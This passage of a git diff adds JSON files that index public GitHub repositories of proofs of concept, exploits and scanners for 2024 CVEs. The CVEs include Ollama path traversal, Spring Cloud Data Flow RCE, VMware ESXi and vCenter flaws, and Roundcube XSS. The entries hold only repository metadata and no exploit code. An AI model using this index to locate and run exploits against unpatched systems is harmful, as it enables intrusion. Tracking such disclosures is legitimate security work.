"web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37032.json b/2024/CVE-2024-37032.json new file mode 100644 index 0000000000..3bb7120ef9 --- /dev/null +++ b/2024/CVE-2024-37032.json @@ -0,0 +1,64 @@ +[ + { + "id": 820213005, + "name": "CVE-2024-37032", + "full_name": "Bi0x\/CVE-2024-37032", + "owner": { + "login": "Bi0x", + "id": 20492440, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20492440?v=4", + "html_url": "https:\/\/github.com\/Bi0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bi0x\/CVE-2024-37032", + "description": "Path traversal in Ollama with rogue registry server", + "fork": false, + "created_at": "2024-06-26T03:11:29Z", + "updated_at": "2024-09-17T07:31:08Z", + "pushed_at": "2024-06-28T03:14:05Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826686892, + "name": "CVE-2024-37032-scanner", + "full_name": "ahboon\/CVE-2024-37032-scanner", + "owner": { + "login": "ahboon", + "id": 7101707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7101707?v=4", + "html_url": "https:\/\/github.com\/ahboon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahboon\/CVE-2024-37032-scanner", + "description": "CVE-2024-37032 scanner", + "fork": false, + "created_at": "2024-07-10T07:24:09Z", + "updated_at": "2024-07-10T15:15:38Z", + "pushed_at": "2024-07-10T07:26:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37051.json b/2024/CVE-2024-37051.json new file mode 100644 index 0000000000..9a2e06881f --- /dev/null +++ b/2024/CVE-2024-37051.json @@ -0,0 +1,68 @@ +[ + { + "id": 813723501, + "name": "CVE-2024-37051-EXP", + "full_name": "LeadroyaL\/CVE-2024-37051-EXP", + "owner": { + "login": "LeadroyaL", + "id": 9478918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9478918?v=4", + "html_url": "https:\/\/github.com\/LeadroyaL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LeadroyaL\/CVE-2024-37051-EXP", + "description": "CVE-2024-37051 poc and exploit", + "fork": false, + "created_at": "2024-06-11T16:01:13Z", + "updated_at": "2024-11-26T12:01:27Z", + "pushed_at": "2024-06-11T19:02:40Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-37051", + "exploit", + "payload" + ], + "visibility": "public", + "forks": 5, + "watchers": 30, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814572729, + "name": "CVE-2024-37051", + "full_name": "mrblackstar26\/CVE-2024-37051", + "owner": { + "login": "mrblackstar26", + "id": 93428115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93428115?v=4", + "html_url": "https:\/\/github.com\/mrblackstar26", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mrblackstar26\/CVE-2024-37051", + "description": "Users of JetBrains IDEs at risk of GitHub access token compromise (CVE-2024-37051)", + "fork": false, + "created_at": "2024-06-13T09:15:58Z", + "updated_at": "2024-06-13T09:22:33Z", + "pushed_at": "2024-06-13T09:22:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37081.json b/2024/CVE-2024-37081.json new file mode 100644 index 0000000000..0968fc2e19 --- /dev/null +++ b/2024/CVE-2024-37081.json @@ -0,0 +1,133 @@ +[ + { + "id": 825088581, + "name": "CVE-2024-37081", + "full_name": "mbadanoiu\/CVE-2024-37081", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2024-37081", + "description": "CVE-2024-37081: Multiple Local Privilege Escalation in VMware vCenter Server", + "fork": false, + "created_at": "2024-07-06T18:29:13Z", + "updated_at": "2024-08-29T13:31:14Z", + "pushed_at": "2024-07-06T18:38:16Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "cve", + "cve-2024-37081", + "cves", + "local-privilege-escalation" + ], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826394284, + "name": "CVE-2024-37081", + "full_name": "Mr-r00t11\/CVE-2024-37081", + "owner": { + "login": "Mr-r00t11", + "id": 68824333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68824333?v=4", + "html_url": "https:\/\/github.com\/Mr-r00t11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-r00t11\/CVE-2024-37081", + "description": null, + "fork": false, + "created_at": "2024-07-09T16:14:41Z", + "updated_at": "2024-11-20T16:30:56Z", + "pushed_at": "2024-07-09T16:22:15Z", + "stargazers_count": 54, + "watchers_count": 54, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 54, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 831660859, + "name": "-CVE-2024-37081-POC", + "full_name": "CERTologists\/-CVE-2024-37081-POC", + "owner": { + "login": "CERTologists", + "id": 176203032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176203032?v=4", + "html_url": "https:\/\/github.com\/CERTologists", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CERTologists\/-CVE-2024-37081-POC", + "description": null, + "fork": false, + "created_at": "2024-07-21T08:41:40Z", + "updated_at": "2024-07-21T08:41:40Z", + "pushed_at": "2024-07-21T08:41:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831661049, + "name": "Modified-CVE-2024-37081-POC", + "full_name": "CERTologists\/Modified-CVE-2024-37081-POC", + "owner": { + "login": "CERTologists", + "id": 176203032, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176203032?v=4", + "html_url": "https:\/\/github.com\/CERTologists", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CERTologists\/Modified-CVE-2024-37081-POC", + "description": null, + "fork": false, + "created_at": "2024-07-21T08:42:23Z", + "updated_at": "2024-07-21T08:48:29Z", + "pushed_at": "2024-07-21T08:48:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37084.json b/2024/CVE-2024-37084.json new file mode 100644 index 0000000000..a878148a47 --- /dev/null +++ b/2024/CVE-2024-37084.json @@ -0,0 +1,162 @@ +[ + { + "id": 855311249, + "name": "CVE-2024-37084-Poc", + "full_name": "Kayiyan\/CVE-2024-37084-Poc", + "owner": { + "login": "Kayiyan", + "id": 126185640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126185640?v=4", + "html_url": "https:\/\/github.com\/Kayiyan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kayiyan\/CVE-2024-37084-Poc", + "description": "Analysis , Demo exploit and poc about CVE-2024-37084", + "fork": false, + "created_at": "2024-09-10T16:58:54Z", + "updated_at": "2024-11-20T18:27:41Z", + "pushed_at": "2024-09-24T02:41:27Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855821849, + "name": "CVE-2024-37084", + "full_name": "vuhz\/CVE-2024-37084", + "owner": { + "login": "vuhz", + "id": 90823042, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90823042?v=4", + "html_url": "https:\/\/github.com\/vuhz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vuhz\/CVE-2024-37084", + "description": "Spring Cloud Remote Code Execution", + "fork": false, + "created_at": "2024-09-11T14:09:50Z", + "updated_at": "2024-09-13T03:21:50Z", + "pushed_at": "2024-09-11T14:12:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872838076, + "name": "CVE-2024-37084-Exp", + "full_name": "Ly4j\/CVE-2024-37084-Exp", + "owner": { + "login": "Ly4j", + "id": 73785589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73785589?v=4", + "html_url": "https:\/\/github.com\/Ly4j", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ly4j\/CVE-2024-37084-Exp", + "description": "Spring Cloud Data Flow CVE-2024-37084 exp", + "fork": false, + "created_at": "2024-10-15T06:55:05Z", + "updated_at": "2024-10-16T02:27:56Z", + "pushed_at": "2024-10-16T02:27:53Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 873195770, + "name": "CVE-2024-37084-Exp", + "full_name": "A0be\/CVE-2024-37084-Exp", + "owner": { + "login": "A0be", + "id": 184107161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184107161?v=4", + "html_url": "https:\/\/github.com\/A0be", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/A0be\/CVE-2024-37084-Exp", + "description": "Spring Cloud Data Flow CVE-2024-37084 exp", + "fork": false, + "created_at": "2024-10-15T18:54:25Z", + "updated_at": "2024-10-15T19:09:22Z", + "pushed_at": "2024-10-15T18:56:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892641642, + "name": "cve-2024-37084-Poc", + "full_name": "XiaomingX\/cve-2024-37084-Poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-37084-Poc", + "description": "CVE-2024-37084是Spring Cloud Data Flow中的一个高危漏洞,影响版本为2.11.0至2.11.3。该漏洞允许具有Skipper服务器API访问权限的攻击者通过精心构造的上传请求,将任意文件写入服务器文件系统的任意位置,进而可能导致远程代码执行,严重威胁服务器安全。", + "fork": false, + "created_at": "2024-11-22T13:53:42Z", + "updated_at": "2024-11-22T14:52:35Z", + "pushed_at": "2024-11-22T14:02:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exp", + "poc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37085.json b/2024/CVE-2024-37085.json new file mode 100644 index 0000000000..ad02d69c84 --- /dev/null +++ b/2024/CVE-2024-37085.json @@ -0,0 +1,126 @@ +[ + { + "id": 837225608, + "name": "CVE-2024-37085", + "full_name": "mahmutaymahmutay\/CVE-2024-37085", + "owner": { + "login": "mahmutaymahmutay", + "id": 171496549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171496549?v=4", + "html_url": "https:\/\/github.com\/mahmutaymahmutay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mahmutaymahmutay\/CVE-2024-37085", + "description": "Vulnerability Scanner for CVE-2024-37085 and Exploits ( For Educational Purpose only)", + "fork": false, + "created_at": "2024-08-02T13:31:59Z", + "updated_at": "2024-09-02T19:21:10Z", + "pushed_at": "2024-08-02T13:45:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 838984689, + "name": "CVE-2024-37085-RCE-POC", + "full_name": "Florian-Hoth\/CVE-2024-37085-RCE-POC", + "owner": { + "login": "Florian-Hoth", + "id": 177672507, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/177672507?v=4", + "html_url": "https:\/\/github.com\/Florian-Hoth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Florian-Hoth\/CVE-2024-37085-RCE-POC", + "description": "CVE-2024-37085 VMware ESXi RCE Vulnerability", + "fork": false, + "created_at": "2024-08-06T18:23:43Z", + "updated_at": "2024-11-20T16:31:00Z", + "pushed_at": "2024-08-06T18:25:19Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 841585434, + "name": "Vmware-ESXI", + "full_name": "WTN-arny\/Vmware-ESXI", + "owner": { + "login": "WTN-arny", + "id": 178199794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/178199794?v=4", + "html_url": "https:\/\/github.com\/WTN-arny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WTN-arny\/Vmware-ESXI", + "description": "CVE-2024-37085 unauthenticated shell upload to full administrator on domain-joined esxi hypervisors.", + "fork": false, + "created_at": "2024-08-12T17:44:17Z", + "updated_at": "2024-08-12T17:47:43Z", + "pushed_at": "2024-08-12T17:47:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844208301, + "name": "CVE-2024-37085", + "full_name": "WTN-arny\/CVE-2024-37085", + "owner": { + "login": "WTN-arny", + "id": 178199794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/178199794?v=4", + "html_url": "https:\/\/github.com\/WTN-arny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WTN-arny\/CVE-2024-37085", + "description": null, + "fork": false, + "created_at": "2024-08-18T17:48:34Z", + "updated_at": "2024-08-18T17:49:21Z", + "pushed_at": "2024-08-18T17:49:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37147.json b/2024/CVE-2024-37147.json new file mode 100644 index 0000000000..a483c314c1 --- /dev/null +++ b/2024/CVE-2024-37147.json @@ -0,0 +1,33 @@ +[ + { + "id": 827270291, + "name": "CVE-2024-37147-PoC", + "full_name": "0xmupa\/CVE-2024-37147-PoC", + "owner": { + "login": "0xmupa", + "id": 61334200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61334200?v=4", + "html_url": "https:\/\/github.com\/0xmupa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xmupa\/CVE-2024-37147-PoC", + "description": null, + "fork": false, + "created_at": "2024-07-11T10:20:00Z", + "updated_at": "2024-07-11T10:20:14Z", + "pushed_at": "2024-07-11T10:20:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37383.json b/2024/CVE-2024-37383.json new file mode 100644 index 0000000000..daa9a7a453 --- /dev/null +++ b/2024/CVE-2024-37383.json @@ -0,0 +1,64 @@ +[ + { + "id": 877680662, + "name": "CVE-2024-37383-POC", + "full_name": "bartfroklage\/CVE-2024-37383-POC", + "owner": { + "login": "bartfroklage", + "id": 4425568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4425568?v=4", + "html_url": "https:\/\/github.com\/bartfroklage", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bartfroklage\/CVE-2024-37383-POC", + "description": "Proof of concept for CVE-2024-37383", + "fork": false, + "created_at": "2024-10-24T04:01:03Z", + "updated_at": "2024-11-10T22:07:27Z", + "pushed_at": "2024-10-24T05:48:34Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 882582274, + "name": "CVE-2024-37383-exploit", + "full_name": "amirzargham\/CVE-2024-37383-exploit", + "owner": { + "login": "amirzargham", + "id": 133110721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133110721?v=4", + "html_url": "https:\/\/github.com\/amirzargham", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amirzargham\/CVE-2024-37383-exploit", + "description": "Roundcube mail server exploit for CVE-2024-37383 (Stored XSS)", + "fork": false, + "created_at": "2024-11-03T07:16:46Z", + "updated_at": "2024-11-03T07:24:35Z", + "pushed_at": "2024-11-03T07:24:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37393.json b/2024/CVE-2024-37393.json new file mode 100644 index 0000000000..06ec5cb1f8 --- /dev/null +++ b/2024/CVE-2024-37393.json @@ -0,0 +1,33 @@ +[ + { + "id": 813073392, + "name": "securenvoy-cve-2024-37393", + "full_name": "optistream\/securenvoy-cve-2024-37393", + "owner": { + "login": "optistream", + "id": 160848410, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/160848410?v=4", + "html_url": "https:\/\/github.com\/optistream", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/optistream\/securenvoy-cve-2024-37393", + "description": "Vulnerability check script for CVE-2024-37393 (SecurEnvoy MFA 9.4.513)", + "fork": false, + "created_at": "2024-06-10T12:42:57Z", + "updated_at": "2024-06-20T02:01:22Z", + "pushed_at": "2024-06-10T13:43:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37713.json b/2024/CVE-2024-37713.json new file mode 100644 index 0000000000..b01ded098f --- /dev/null +++ b/2024/CVE-2024-37713.json @@ -0,0 +1,33 @@ +[ + { + "id": 854131584, + "name": "CVE-2024-37713", + "full_name": "fullbbadda1208\/CVE-2024-37713", + "owner": { + "login": "fullbbadda1208", + "id": 67869836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67869836?v=4", + "html_url": "https:\/\/github.com\/fullbbadda1208", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fullbbadda1208\/CVE-2024-37713", + "description": null, + "fork": false, + "created_at": "2024-09-08T13:19:36Z", + "updated_at": "2024-09-08T13:35:13Z", + "pushed_at": "2024-09-08T13:19:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37726.json b/2024/CVE-2024-37726.json new file mode 100644 index 0000000000..e42b130a70 --- /dev/null +++ b/2024/CVE-2024-37726.json @@ -0,0 +1,64 @@ +[ + { + "id": 823516489, + "name": "CVE-2024-37726-MSI-Center-Local-Privilege-Escalation", + "full_name": "carsonchan12345\/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation", + "owner": { + "login": "carsonchan12345", + "id": 44266907, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44266907?v=4", + "html_url": "https:\/\/github.com\/carsonchan12345", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/carsonchan12345\/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation", + "description": null, + "fork": false, + "created_at": "2024-07-03T07:26:07Z", + "updated_at": "2024-11-28T14:44:06Z", + "pushed_at": "2024-07-04T04:23:40Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 33, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 825258239, + "name": "CVE-2024-37726-MSI-Center-Local-Privilege-Escalation", + "full_name": "NextGenPentesters\/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation", + "owner": { + "login": "NextGenPentesters", + "id": 169174200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169174200?v=4", + "html_url": "https:\/\/github.com\/NextGenPentesters", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NextGenPentesters\/CVE-2024-37726-MSI-Center-Local-Privilege-Escalation", + "description": null, + "fork": false, + "created_at": "2024-07-07T09:21:21Z", + "updated_at": "2024-07-07T09:25:56Z", + "pushed_at": "2024-07-07T09:25:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37742.json b/2024/CVE-2024-37742.json new file mode 100644 index 0000000000..f0d077058a --- /dev/null +++ b/2024/CVE-2024-37742.json @@ -0,0 +1,33 @@ +[ + { + "id": 817975765, + "name": "CVE-2024-37742", + "full_name": "Eteblue\/CVE-2024-37742", + "owner": { + "login": "Eteblue", + "id": 151763816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151763816?v=4", + "html_url": "https:\/\/github.com\/Eteblue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Eteblue\/CVE-2024-37742", + "description": "This repository contains a PoC for exploiting CVE-2024-37742, a vulnerability in Safe Exam Browser (SEB) ≤ 3.5.0 on Windows. The vulnerability enables unauthorized clipboard data sharing between SEB's kiosk mode and the underlying system, compromising the integrity of exams.", + "fork": false, + "created_at": "2024-06-20T21:01:28Z", + "updated_at": "2024-06-24T08:36:55Z", + "pushed_at": "2024-06-23T00:16:38Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37759.json b/2024/CVE-2024-37759.json new file mode 100644 index 0000000000..9fa38070f0 --- /dev/null +++ b/2024/CVE-2024-37759.json @@ -0,0 +1,33 @@ +[ + { + "id": 818063757, + "name": "CVE-2024-37759_PoC", + "full_name": "crumbledwall\/CVE-2024-37759_PoC", + "owner": { + "login": "crumbledwall", + "id": 44513103, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44513103?v=4", + "html_url": "https:\/\/github.com\/crumbledwall", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crumbledwall\/CVE-2024-37759_PoC", + "description": "PoC of CVE-2024-37759", + "fork": false, + "created_at": "2024-06-21T02:58:40Z", + "updated_at": "2024-11-08T09:40:22Z", + "pushed_at": "2024-06-23T15:00:43Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37762.json b/2024/CVE-2024-37762.json new file mode 100644 index 0000000000..eaa83c8d3c --- /dev/null +++ b/2024/CVE-2024-37762.json @@ -0,0 +1,33 @@ +[ + { + "id": 822535716, + "name": "cve-2024-37762", + "full_name": "Atreb92\/cve-2024-37762", + "owner": { + "login": "Atreb92", + "id": 36992456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36992456?v=4", + "html_url": "https:\/\/github.com\/Atreb92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Atreb92\/cve-2024-37762", + "description": null, + "fork": false, + "created_at": "2024-07-01T10:28:56Z", + "updated_at": "2024-08-04T09:52:47Z", + "pushed_at": "2024-07-01T10:33:12Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37763.json b/2024/CVE-2024-37763.json new file mode 100644 index 0000000000..54688e1661 --- /dev/null +++ b/2024/CVE-2024-37763.json @@ -0,0 +1,33 @@ +[ + { + "id": 822538828, + "name": "cve-2024-37763", + "full_name": "Atreb92\/cve-2024-37763", + "owner": { + "login": "Atreb92", + "id": 36992456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36992456?v=4", + "html_url": "https:\/\/github.com\/Atreb92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Atreb92\/cve-2024-37763", + "description": null, + "fork": false, + "created_at": "2024-07-01T10:35:51Z", + "updated_at": "2024-08-04T09:55:59Z", + "pushed_at": "2024-07-01T10:36:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37764.json b/2024/CVE-2024-37764.json new file mode 100644 index 0000000000..69491191c9 --- /dev/null +++ b/2024/CVE-2024-37764.json @@ -0,0 +1,33 @@ +[ + { + "id": 822539510, + "name": "cve-2024-37764", + "full_name": "Atreb92\/cve-2024-37764", + "owner": { + "login": "Atreb92", + "id": 36992456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36992456?v=4", + "html_url": "https:\/\/github.com\/Atreb92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Atreb92\/cve-2024-37764", + "description": null, + "fork": false, + "created_at": "2024-07-01T10:37:21Z", + "updated_at": "2024-08-04T09:56:02Z", + "pushed_at": "2024-07-01T10:38:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-37765.json b/2024/CVE-2024-37765.json new file mode 100644 index 0000000000..e3d132fc9c --- /dev/null +++ b/2024/CVE-2024-37765.json @@ -0,0 +1,33 @@ +[ + { + "id": 822540396, + "name": "cve-2024-37765", + "full_name": "Atreb92\/cve-2024-37765", + "owner": { + "login": "Atreb92", + "id": 36992456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36992456?v=4", + "html_url": "https:\/\/github.com\/Atreb92", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Atreb92\/cve-2024-37765", + "description": null, + "fork": false, + "created_at": "2024-07-01T10:39:40Z", + "updated_at": "2024-08-04T09:52:45Z", + "pushed_at": "2024-07-01T10:42:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": 